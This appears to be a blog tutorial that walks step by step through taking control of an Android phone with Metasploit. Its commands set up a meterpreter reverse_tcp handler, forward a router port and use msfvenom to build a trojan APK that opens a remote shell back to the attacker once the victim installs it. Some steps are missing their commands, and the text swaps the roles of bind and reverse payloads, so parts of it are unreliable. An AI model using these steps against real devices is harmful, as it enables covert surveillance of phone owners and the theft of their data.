The usage statistics of the android platform has been significantly increased over the last decade and it’s rather crucial to discuss how well it have passed the stages of security in terms of trojans and the most competing viruses of today.
Just as the windows platform can be compromised if necessary precautions are not taken, the same could be said for the android. Over the years various practices have been taken into account to circumvent these security policies of android platform and metasploit being one of those.
An exceptional powerful tool named metasploit is basically a tool written in ruby and is quite handy at being used as a secondary command line interface. It provide access to diverse modules, each with an intended task to perform, and are further categorized into sub-modules.
Metasploit is famous among the researchers because of it’s handy interface and the large database of exploits that it offers.
Everyday or week, when a new severe vulnerability gets discovered, the developers of metasploit would publish it publicly on the ExploitDB platform. Read more about gaining access to multiple platforms with shellpop:
Anti-Virus Softwares and the Firewalls are very well acquainted with metasploit payload signatures and how it obfuscates the payload which is to gain the backdoor access.
So, the AV detects the virus and move it away instead of letting it execute. Hence, being a strong guarding agent in the way of metasploit.
Let’s see how we can gain access to an android smartphone with metasploit:
Open the console (terminal). Check the weekly updates and make changes to metasploit if necessary or if any new modules are detected. Doing so will keep you informed of newly added modules and exploits.
apt install metasploit-framework
After that, start postgresql database service. Metasploit uses postgresql as the storage database. This will enable us to quickly navigate and search through metasploit modules, preventing the slow search issue that wastes time while systematizing the output.
systemctl enable postgresql systemctl start postgresql
Enabling the postgresql will start it everytime the system boots. Now, there’s no need to perform this step, next time, metasploit is going to flash.
Type msfconsole in terminal and press [Enter]. It will take a few seconds to bring the interface up to its fully functional state.
Choose The Exploit
Search for an appropriate exploit for target OS using search command. Our target is an android smartphone. So, the query for an Android could be like:
search type:exploit platform:android
It will list the exploits available for android platform. You can get help on metasploit commands by typing help followed by a space with command name such as help search. It will print the manual for search command. Here’s the output for android exploit search:
From the given list of exploits as shown in the image, we will use the generic exploit as highlighted. Now, to use the exploit, enter this command:
There is a set of payloads given for every single exploit. These payloads are actually the exploit modules that provides a backbone environment for transferring and executing commands on target window. Different payloads are used according to the given scenario and by guessing how much working space of target is required. Well, to show the payloads given for an exploit. Type in:
From the given set of payloads, we will use android/meterpreter/reverse_tcp. It’s a great versatile payload to get started with. It will bring us a meterpreter session if payload executes unspotted. This meterpreter payload presents a handful list of directives which are useful enough to wholly compromise the target system.
At this point we need to know the basic difference between reverse and bind payloads. Bind payload will let you open a connection on the target system while the reverse payload would open a listening connection on the target machine, making it the host.
For the quick info, bind payloads are more useful when the target is a server or a device which is directly connected to internet and have a static IP. Reverse payloads are rather more adopted because of the nature of it’s working.
Because most of the computers are behind NATon the internet, it’s most likely that the bind payload is not going to work in this situation. Set the payload :
set PAYLOAD android/meterpreter/reverse_tcp
Attain the information of exploit using info command. This is the key step to get an idea, how actually the exploit works. It will give you the background information like what could be the possible targets and what the core of vulnerability is.
At this point, we know the working of exploit. Now, we have to setup the options for our exploit which are LHOST for local address of attacker and LPORT for the local port to use. To find local IP address type.
So, my local IP is 192.168.1.10. Set LHOST and LPORT
set LHOST 192.168.1.10 set LPORT 777 # Port for establishing connections
Make sure that both of the paramters are correctly modified.
Run The Exploit
Run the exploit as a job. The exploit will execute in the background and will notify you whenever the payload executes on the target system. Afterward, we will use sessions command to launch (target) session.
Find the Gateway IP of your Network and navigate to that IP through a web browser and login. Type:
Now, open a web browser and login to Router administrative Page.
After successful login, enable the port 777 so that firewall allows the client and attacker machines to forward and receive traffic. You probably don’t know how to forward a port on your router. For doing so, go to PortForward.com, search for your router company and model and follow the instructions for your router.
Generate (Infected) Application
For generating the infected (payload) application with extension .apk, we will use msfvenom, native payload generator of Metasploit framework. Open a new console (terminal) and generate a Simple Payload Application for android.
msfvenom -p android/meterpreter/reverse_tcp --platform android -o /root/Desktop/application.apk LHOST=Public IP Address (attacker) LPORT=777
- -p: payload to use
- –platform: Target Platform
- -o: Path to place the infected file
- LHOST: Public IP of attacker (local) Machine
- LPORT: Public Port of attacker (local) Machine
Own The Target
Now, as soon the spawned apk file will be installed on an android Operating System (target). Metasploit terminal which we have left open will bring us a live target session. List the available sessions:
Now, to interact with a session. Just type in the session identifier (ID) after the sessions directive. It will take you to the meterpreter shell.
sessions [n] # [n] is the ID of available sessions
Meterpreter session will be launched. Type help command. It will list a handful of commands from getting system info to starting live Chat.
meterpreter > help
Ignore meterpreter > . Its just there to indicate that its a meteterpreter session.
Lets try the shell command. It will bring us the terminal or cmd (if windows) of target system. Try to execute a command.
meterpreter > shell
Android is the most widely adopted Operating System, making it the most famous platform even decisivly leaving windows behind and on the verge of security policies. Just like other platforms, android can be compromised with a few considerations in mind and metasploit can help us being one of those. However, one moust note that the security in terms of android as compared to windows is usually considered more secure and liable to rely on.